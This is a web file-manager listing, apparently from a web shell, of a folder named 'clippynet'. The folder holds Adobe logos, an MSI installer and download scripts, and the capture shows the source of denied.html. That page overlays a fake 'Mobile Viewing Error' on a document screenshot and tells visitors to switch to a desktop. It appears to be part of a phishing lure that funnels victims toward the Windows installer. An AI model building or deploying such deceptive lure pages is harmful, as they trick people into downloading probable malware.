at path:
ROOT
/
clippynet
/
denied.html
run:
R
W
Run
clippynet
DIR
2026-02-09 16:39:08
R
W
Run
Screenshot 2025-04-25 161700.png
49.54 KB
2025-04-25 13:46:15
R
W
Run
Delete
Rename
adobe-logo-2017.png
19.41 KB
2025-04-25 14:12:59
R
W
Run
Delete
Rename
adobe-logo.png
69.02 KB
2025-04-25 14:52:26
R
W
Run
Delete
Rename
adobe.png
18.2 KB
2025-04-25 14:54:24
R
W
Run
Delete
Rename
adobeicon.png
68.11 KB
2025-04-25 14:35:27
R
W
Run
Delete
Rename
clippynet.msi
9.61 MB
2026-01-27 16:30:48
R
W
Run
Delete
Rename
complete.php
2.69 KB
2026-01-27 16:43:17
R
W
Run
Delete
Rename
denied.html
2.88 KB
2025-04-25 16:02:38
R
W
Run
Delete
Rename
download.html
3.35 KB
2026-01-27 16:32:56
R
W
Run
Delete
Rename
download.php
431 By
2026-01-27 16:31:54
R
W
Run
Delete
Rename
index.html
2.72 KB
2025-04-25 21:10:26
R
W
Run
Delete
Rename
error_log
up
📄
denied.html
Save
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Document Viewing Error</title> <style> body { margin: 0; padding: 0; background-image: url('Screenshot 2025-04-25 161700.png'); background-size: contain; background-position: center; background-repeat: no-repeat; min-height: 100vh; width: 100%; background-color: #ffffff; font-family: Arial, sans-serif; -webkit-text-size-adjust: 100%; } .modal-overlay { position: fixed; top: 0; left: 0; height: 100%; width: 100%; background-color: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 1000; padding: 15px; box-sizing: border-box; } .modal-content { background-color: white; padding: 20px; border-radius: 10px; width: 100%; max-width: 500px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3); animation: modalFadeIn 0.3s ease-out; text-align: center; } @keyframes modalFadeIn { from { opacity: 0; transform: translateY(-20px); } to { opacity: 1; transform: translateY(0); } } .modal-header { margin-bottom: 15px; } .alert-icon { font-size: 3rem; color: #ED2224; margin-bottom: 15px; line-height: 1; } h2 { font-size: 1.5rem; margin: 0 0 10px 0; color: #333; } .modal-text { font-size: 1rem; line-height: 1.5; color: #555; margin-bottom: 10px; } .modal-subtext { font-size: 0.9rem; line-height: 1.5; color: #666; padding-top: 10px; margin: 0; } /* Responsive adjustments */ @media (max-width: 480px) { .modal-content { padding: 15px; } .alert-icon { font-size: 2.5rem; margin-bottom: 10px; } h2 { font-size: 1.3rem; } .modal-text, .modal-subtext { font-size: 0.9rem; } } @media (max-width: 360px) { .modal-content { padding: 12px; } h2 { font-size: 1.2rem; } } </style> </head> <body> <div id="confirmationModal" class="modal-overlay"> <div class="modal-content"> <div class="modal-header"> <div class="alert-icon">⚠️</div> <h2>Mobile Viewing Error</h2> </div> <p class="modal-text"> This file cannot be viewed on mobile devices. </p> <p class="modal-subtext"> Please use a laptop or desktop computer to view this file. </p> </div> </div> </body> </html>